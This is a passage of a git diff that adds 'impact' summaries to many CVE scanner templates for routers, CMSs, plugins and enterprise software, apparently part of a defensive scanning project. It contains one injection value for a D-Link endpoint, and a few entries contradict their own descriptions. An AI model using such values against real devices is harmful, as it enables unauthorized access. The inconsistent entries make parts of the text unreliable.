to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities. remediation: | Upgrade to a patched version of IceWarp WebMail Server (>=11.4.4.2) or apply the vendor-provided patch to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-8515.yaml b/http/cves/2020/CVE-2020-8515.yaml index 56842f7dd0..e24ce06231 100644 --- a/http/cves/2020/CVE-2020-8515.yaml +++ b/http/cves/2020/CVE-2020-8515.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected router, leading to complete compromise of the device and potential unauthorized access to the network. remediation: This issue has been fixed in Vigor3900/2960/300B v1.5.1. reference: - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515) diff --git a/http/cves/2020/CVE-2020-8641.yaml b/http/cves/2020/CVE-2020-8641.yaml index e94584809d..822045a608 100644 --- a/http/cves/2020/CVE-2020-8641.yaml +++ b/http/cves/2020/CVE-2020-8641.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Lotus Core CMS 1.0.1 allows authenticated local file inclusion of .php files via directory traversal in the index.php page_slug parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Apply the latest security patch or update to Lotus Core CMS 1.0.1 to fix the LFI vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-8644.yaml b/http/cves/2020/CVE-2020-8644.yaml index c53f839a85..ad161e4e0c 100644 --- a/http/cves/2020/CVE-2020-8644.yaml +++ b/http/cves/2020/CVE-2020-8644.yaml @@ -5,6 +5,8 @@ info: author: dbrwsky severity: critical description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system. remediation: | Upgrade playSMS to version 1.4.4 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-8654.yaml b/http/cves/2020/CVE-2020-8654.yaml index e166b0db52..584d6f8e9d 100644 --- a/http/cves/2020/CVE-2020-8654.yaml +++ b/http/cves/2020/CVE-2020-8654.yaml @@ -5,6 +5,8 @@ info: author: praetorian-thendrickson severity: high description: EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465. + impact: | + Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary SQL queries or remote code on the affected system. remediation: | Upgrade to a patched version of EyesOfNetwork or apply the necessary security patches to mitigate the vulnerabilities. reference: diff --git a/http/cves/2020/CVE-2020-8771.yaml b/http/cves/2020/CVE-2020-8771.yaml index b4159f8a34..8c32131776 100644 --- a/http/cves/2020/CVE-2020-8771.yaml +++ b/http/cves/2020/CVE-2020-8771.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: WordPress Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts. + impact: | + An attacker can bypass authentication and gain unauthorized access to the WordPress Time Capsule plugin. remediation: | Update WordPress Time Capsule plugin to version 1.21.16 or later. reference: diff --git a/http/cves/2020/CVE-2020-8772.yaml b/http/cves/2020/CVE-2020-8772.yaml index 9f70f098a3..88f3572bd0 100644 --- a/http/cves/2020/CVE-2020-8772.yaml +++ b/http/cves/2020/CVE-2020-8772.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress InfiniteWP plugin before 1.9.4.5 for WordPress contains an authorization bypass vulnerability via a missing authorization check in iwp_mmb_set_request in init.php. An attacker who knows the username of an administrator can log in, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can gain unauthorized administrative access to the WordPress site. remediation: Upgrade to InfiniteWP 1.9.4.5 or higher. reference: - https://wpscan.com/vulnerability/10011 diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml index d7b8500443..658aec960e 100644 --- a/http/cves/2020/CVE-2020-8813.yaml +++ b/http/cves/2020/CVE-2020-8813.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Cacti v1.2.8 is susceptible to remote code execution. This vulnerability could be exploited without authentication if "Guest Realtime Graphs" privileges are enabled. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to a patched version of Cacti v1.2.9 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-8982.yaml b/http/cves/2020/CVE-2020-8982.yaml index f6b2e7de79..4982604ebf 100644 --- a/http/cves/2020/CVE-2020-8982.yaml +++ b/http/cves/2020/CVE-2020-8982.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: Citrix ShareFile StorageZones (aka storage zones) Controller versions through at least 5.10.x are susceptible to an unauthenticated arbitrary file read vulnerability. + impact: | + An attacker can read arbitrary files on the affected system, potentially leading to unauthorized access to sensitive information. remediation: | Upgrade Citrix ShareFile StorageZones to version 5.11 or higher to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9036.yaml b/http/cves/2020/CVE-2020-9036.yaml index b47c3ae446..55385650ca 100644 --- a/http/cves/2020/CVE-2020-9036.yaml +++ b/http/cves/2020/CVE-2020-9036.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Jeedom through 4.0.38 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Jeedom to version 4.0.39 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9043.yaml b/http/cves/2020/CVE-2020-9043.yaml index c2d504a9fa..98fbafbc2d 100644 --- a/http/cves/2020/CVE-2020-9043.yaml +++ b/http/cves/2020/CVE-2020-9043.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress wpCentral plugin before 1.5.1 is susceptible to information disclosure. An attacker can access the connection key for WordPress Admin account and thus potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the wpCentral plugin. remediation: | Update the wpCentral plugin to version 1.5.1 or later to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9047.yaml b/http/cves/2020/CVE-2020-9047.yaml index 92307bd5b9..9123d93a9e 100644 --- a/http/cves/2020/CVE-2020-9047.yaml +++ b/http/cves/2020/CVE-2020-9047.yaml @@ -6,6 +6,8 @@ info: severity: high description: | exacqVision Web Service is susceptible to remote code execution which could allow the execution of unauthorized code or operating system commands on systems running exacqVision Web Service versions 20.06.3.0 and prior and exacqVision Enterprise Manager versions 20.06.4.0 and prior. An attacker with administrative privileges could potentiallydownload and run a malicious executable that could allow OS command injection on the system. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or update provided by the vendor to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9054.yaml b/http/cves/2020/CVE-2020-9054.yaml index d939ef62f2..e75d83a27b 100644 --- a/http/cves/2020/CVE-2020-9054.yaml +++ b/http/cves/2020/CVE-2020-9054.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: critical description: 'Multiple Zyxel network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. Zyxel NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the Zyxel device. Although the web server does not run as the root user, Zyyxel devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable Zyyxel device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker. However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any Zyyxel device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 Zyyxel has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2.' + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device. remediation: | Apply the latest firmware update provided by Zyxel to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9315.yaml b/http/cves/2020/CVE-2020-9315.yaml index 97a2b479ba..282c4a7864 100644 --- a/http/cves/2020/CVE-2020-9315.yaml +++ b/http/cves/2020/CVE-2020-9315.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Oracle iPlanet Web Server 7.0.x has incorrect access control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE a related support policy can be found in the www.oracle.com references attached to this CVE. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected system. remediation: | Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml index 636e3f7b4a..ffac922deb 100644 --- a/http/cves/2020/CVE-2020-9344.yaml +++ b/http/cves/2020/CVE-2020-9344.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: Jira Subversion ALM for Enterprise before 8.8.2 contains a cross-site scripting vulnerability at multiple locations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade Jira Subversion ALM for Enterprise to version 8.8.2 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9376.yaml b/http/cves/2020/CVE-2020-9376.yaml index 311de84011..69601b716f 100644 --- a/http/cves/2020/CVE-2020-9376.yaml +++ b/http/cves/2020/CVE-2020-9376.yaml @@ -7,6 +7,8 @@ info: description: | D-Link DIR-610 devices allow information disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. + impact: | + An attacker can gain sensitive information from the device, leading to potential unauthorized access or further attacks. remediation: | Apply the latest firmware update provided by D-Link to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9402.yaml b/http/cves/2020/CVE-2020-9402.yaml index 44c5606cec..0df83e41ac 100644 --- a/http/cves/2020/CVE-2020-9402.yaml +++ b/http/cves/2020/CVE-2020-9402.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Upgrade to the latest version. reference: - https://www.debian.org/security/2020/dsa-4705 diff --git a/http/cves/2020/CVE-2020-9425.yaml b/http/cves/2020/CVE-2020-9425.yaml index e3811e3404..4b09fd09d2 100644 --- a/http/cves/2020/CVE-2020-9425.yaml +++ b/http/cves/2020/CVE-2020-9425.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: high description: rConfig prior to version 3.9.4 is susceptible to sensitive information disclosure. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application does not exit after a redirect is applied, the rest of the page still executes, resulting in the disclosure of cleartext credentials in the response. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, such as usernames and passwords. remediation: | Upgrade rConfig to version 3.9.4 or later to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9483.yaml b/http/cves/2020/CVE-2020-9483.yaml index 58dd7452b9..6852370b54 100644 --- a/http/cves/2020/CVE-2020-9483.yaml +++ b/http/cves/2020/CVE-2020-9483.yaml @@ -6,6 +6,8 @@ info: severity: high description: | When using H2/MySQL/TiDB as Apache SkyWalking storage and a metadata query through GraphQL protocol, there is a SQL injection vulnerability which allows access to unexpected data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patches or updates provided by the SkyWalking project to fix the SQL injection vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9484.yaml b/http/cves/2020/CVE-2020-9484.yaml index fcaaa6ee5c..393ee8304b 100644 --- a/http/cves/2020/CVE-2020-9484.yaml +++ b/http/cves/2020/CVE-2020-9484.yaml @@ -11,6 +11,8 @@ info: c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution, allowing attackers to execute arbitrary commands on the affected system. remediation: | Apply the latest security patches provided by Apache to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9496.yaml b/http/cves/2020/CVE-2020-9496.yaml index d0cb28604c..9403732a17 100644 --- a/http/cves/2020/CVE-2020-9496.yaml +++ b/http/cves/2020/CVE-2020-9496.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: Apache OFBiz 17.12.03 contains cross-site scripting and unsafe deserialization vulnerabilities via an XML-RPC request. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Apache OFBiz. reference: diff --git a/http/cves/2020/CVE-2020-9757.yaml b/http/cves/2020/CVE-2020-9757.yaml index 148644ebc1..2e5aa9d671 100644 --- a/http/cves/2020/CVE-2020-9757.yaml +++ b/http/cves/2020/CVE-2020-9757.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Craft CMS before 3.3.0 is susceptible to server-side template injection via the SEOmatic component that could lead to remote code execution via malformed data submitted to the metacontainers controller. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the server. remediation: | Upgrade Craft CMS to version 3.3.0 or higher to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-1472.yaml b/http/cves/2021/CVE-2021-1472.yaml index bdeb6668e5..70e68cee11 100644 --- a/http/cves/2021/CVE-2021-1472.yaml +++ b/http/cves/2021/CVE-2021-1472.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Cisco Small Business RV Series routers RV16X/RV26X versions 1.0.01.02 and before and RV34X versions 1.0.03.20 and before contain multiple OS command injection vulnerabilities in the web-based management interface. A remote attacker can execute arbitrary OS commands via the sessionid cookie or bypass authentication and upload files on an affected device. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected device. remediation: | Apply the latest security patches or firmware updates provided by Cisco to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-1498.yaml b/http/cves/2021/CVE-2021-1498.yaml index 058d924a80..6f4f24bcb1 100644 --- a/http/cves/2021/CVE-2021-1498.yaml +++ b/http/cves/2021/CVE-2021-1498.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Cisco HyperFlex HX contains multiple vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system. remediation: | Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-1499.yaml b/http/cves/2021/CVE-2021-1499.yaml index 50d16bfb90..5634b6050e 100644 --- a/http/cves/2021/CVE-2021-1499.yaml +++ b/http/cves/2021/CVE-2021-1499.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user. + impact: | + Allows an attacker to upload and execute arbitrary files on the target system remediation: | Apply the necessary security patches or updates provided by Cisco reference: diff --git a/http/cves/2021/CVE-2021-20038.yaml b/http/cves/2021/CVE-2021-20038.yaml index eed9339c24..83ee258535 100644 --- a/http/cves/2021/CVE-2021-20038.yaml +++ b/http/cves/2021/CVE-2021-20038.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0, jbaines-r7 severity: critical description: A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code or crash the affected system. remediation: | Apply the latest security patch or update provided by SonicWall to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-20090.yaml b/http/cves/2021/CVE-2021-20090.yaml index 100a7fcdce..8c41e2fe27 100644 --- a/http/cves/2021/CVE-2021-20090.yaml +++ b/http/cves/2021/CVE-2021-20090.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces. + impact: | + An attacker can exploit this vulnerability to read sensitive files, such as configuration files, credentials, or other sensitive information. remediation: | Apply the latest firmware update provided by Buffalo to fix the path traversal vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-20091.yaml b/http/cves/2021/CVE-2021-20091.yaml index b64a33fb89..acfe6804ec 100644 --- a/http/cves/2021/CVE-2021-20091.yaml +++ b/http/cves/2021/CVE-2021-20091.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 does not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution. + impact: | + An attacker can exploit this vulnerability to inject malicious configuration settings, potentially leading to unauthorized access or control of the router. remediation: | Apply the latest firmware update provided by Buffalo to fix the configuration file injection vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-20092.yaml b/http/cves/2021/CVE-2021-20092.yaml index 13f9912daa..74b746d99a 100644 --- a/http/cves/2021/CVE-2021-20092.yaml +++ b/http/cves/2021/CVE-2021-20092.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the router's configuration settings and potentially compromise the entire network. remediation: | Apply the latest firmware update provided by Buffalo to fix the access control issue. reference: diff --git a/http/cves/2021/CVE-2021-20114.yaml b/http/cves/2021/CVE-2021-20114.yaml index fe329b1341..4ea64c10f1 100644 --- a/http/cves/2021/CVE-2021-20114.yaml +++ b/http/cves/2021/CVE-2021-20114.yaml @@ -5,6 +5,8 @@ info: author: push4d severity: high description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files. + impact: | + An attacker can gain access to sensitive information, potentially leading to unauthorized access or data leakage. remediation: | Upgrade TCExam to a version higher than 14.8.1 to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-20123.yaml b/http/cves/2021/CVE-2021-20123.yaml index fa7cd9e1f0..3a553059af 100644 --- a/http/cves/2021/CVE-2021-20123.yaml +++ b/http/cves/2021/CVE-2021-20123.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Draytek VigorConnect 1.6.0-B. reference: diff --git a/http/cves/2021/CVE-2021-20124.yaml b/http/cves/2021/CVE-2021-20124.yaml index 054fa75bf0..39ddbd758f 100644 --- a/http/cves/2021/CVE-2021-20124.yaml +++ b/http/cves/2021/CVE-2021-20124.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, potential data leakage, and further compromise of the affected system. remediation: | Apply the latest security patches or updates provided by Draytek to fix the LFI vulnerability in VigorConnect 6.0-B3. reference: diff --git a/http/cves/2021/CVE-2021-20137.yaml b/http/cves/2021/CVE-2021-20137.yaml index 2f09eb4547..5e6f622480 100644 --- a/http/cves/2021/CVE-2021-20137.yaml +++ b/http/cves/2021/CVE-2021-20137.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: Gryphon Tower router web interface contains a reflected cross-site scripting vulnerability in the url parameter of the /cgi-bin/luci/site_access/ page. An attacker can exploit this issue by tricking a user into following a specially crafted link, granting the attacker JavaScript execution in the victim's browser. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml index 39b290fd00..621091abf8 100644 --- a/http/cves/2021/CVE-2021-20150.yaml +++ b/http/cves/2021/CVE-2021-20150.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page. + impact: | + An attacker can obtain sensitive credentials, leading to unauthorized access to the router. remediation: | Update the router firmware to the latest version to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml index 5b03d8cd54..c015faa914 100644 --- a/http/cves/2021/CVE-2021-20158.yaml +++ b/http/cves/2021/CVE-2021-20158.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command. + impact: | + An attacker with authenticated access can gain unauthorized control over the affected device. remediation: | Upgrade to the latest firmware version provided by Trendnet to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml index 3e443f5567..2299c8d83c 100644 --- a/http/cves/2021/CVE-2021-20323.yaml +++ b/http/cves/2021/CVE-2021-20323.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Keycloak 10.0.0 to 18.0.0 contains a cross-site scripting vulnerability via the client-registrations endpoint. On a POST request, the application does not sanitize an unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as HTML. This can be performed on any realm present on the Keycloak instance. Since the bug requires Content-Type application/json and is submitted via a POST, there is no common path to exploit that has a user impact. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Keycloak to a version that is not affected by the vulnerability (10.0.1 or higher). reference: diff --git a/http/cves/2021/CVE-2021-20792.yaml b/http/cves/2021/CVE-2021-20792.yaml index 4a4b37648e..dbb13bae77 100644 --- a/http/cves/2021/CVE-2021-20792.yaml +++ b/http/cves/2021/CVE-2021-20792.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: WordPress Quiz and Survey Master plugin prior to 7.1.14 contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary script via unspecified vectors. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of WordPress Quiz and Survey Master plugin (7.1.14) to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-20837.yaml b/http/cves/2021/CVE-2021-20837.yaml index 5f845862ba..6e0f5ac0eb 100644 --- a/http/cves/2021/CVE-2021-20837.yaml +++ b/http/cves/2021/CVE-2021-20837.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK,hackergautam severity: critical description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability in MovableType. reference: diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml index cc7b6ddef1..4f27b3f99e 100644 --- a/http/cves/2021/CVE-2021-21087.yaml +++ b/http/cves/2021/CVE-2021-21087.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Adobe Coldfusion versions 2016 (update 16 and earlier), 2018 (update 10 and earlier) and 2021.0.0.323925 are affected by an Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability. An attacker could abuse this vulnerability to execute arbitrary JavaScript code in context of the current user. Exploitation of this issue requires user interaction. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Adobe to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-21234.yaml b/http/cves/2021/CVE-2021-21234.yaml index 533ed50151..a43edaa579 100644 --- a/http/cves/2021/CVE-2021-21234.yaml +++ b/http/cves/2021/CVE-2021-21234.yaml @@ -6,6 +6,8 @@ info: severity: high description: | spring-boot-actuator-logview before version 0.2.13 contains a directory traversal vulnerability in libraries that adds a simple logfile viewer as a spring boot actuator endpoint (maven package "eu.hinsch:spring-boot-actuator-logview". + impact: | + This vulnerability can lead to unauthorized access to sensitive information stored on the server. remediation: | Apply the latest security patches or upgrade to a patched version of Spring Boot Actuator. reference: diff --git a/http/cves/2021/CVE-2021-21287.yaml b/http/cves/2021/CVE-2021-21287.yaml index 94a8b42689..0ee76fce60 100644 --- a/http/cves/2021/CVE-2021-21287.yaml +++ b/http/cves/2021/CVE-2021-21287.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to make arbitrary requests on behalf of the server, potentially leading to unauthorized access or data leakage. remediation: | Apply the latest security patches or updates provided by MinIO to fix this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-21307.yaml b/http/cves/2021/CVE-2021-21307.yaml index da5b6ff56d..9d5bc4e38c 100644 --- a/http/cves/2021/CVE-2021-21307.yaml +++ b/http/cves/2021/CVE-2021-21307.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: critical description: Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, block access to the Lucee Administrator. reference: - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r diff --git a/http/cves/2021/CVE-2021-21311.yaml b/http/cves/2021/CVE-2021-21311.yaml index 6fdf26fe38..7c64b2ddc3 100644 --- a/http/cves/2021/CVE-2021-21311.yaml +++ b/http/cves/2021/CVE-2021-21311.yaml @@ -5,6 +5,8 @@ info: author: Adam Crosser,pwnhxl severity: high description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to internal resources and potential data leakage. remediation: Upgrade to version 4.7.9 or later. reference: - 